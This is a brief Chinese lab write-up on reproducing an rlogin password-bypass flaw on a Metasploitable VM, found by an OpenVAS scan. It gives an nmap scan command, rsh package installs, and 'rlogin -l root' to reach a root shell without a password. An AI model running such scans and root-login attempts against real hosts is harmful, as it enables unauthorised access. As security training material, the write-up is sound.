在使用openvas对meta靶机进行漏扫时,发现高危漏洞如下:
对此尝试进行复现,实验环境:
攻击机:kali linux
靶机:metasploittable ip:192.168.204.130
首先使用nmap对靶机进行探测,命令为nmap 192.168.204.130
发现所有端口可正常访问
在kali上安装rsh服务,命令为:
sudo apt-get install rsh-server #server
sudo apt-get install rsh-client #客户端
使用rlogin命令:rlogin -l root 192.168.204.130尝试绕过密码登录,发现成功
完成该漏洞复现
文章描述了如何使用OpenVAS在Meta靶机上发现高危漏洞,然后在KaliLinux攻击机上通过nmap探测靶机并安装RSH服务。接着,利用rlogin命令尝试无密码登录靶机192.168.204.130,并成功绕过密码验证,从而完成漏洞复现过程。

被折叠的 条评论
为什么被折叠?



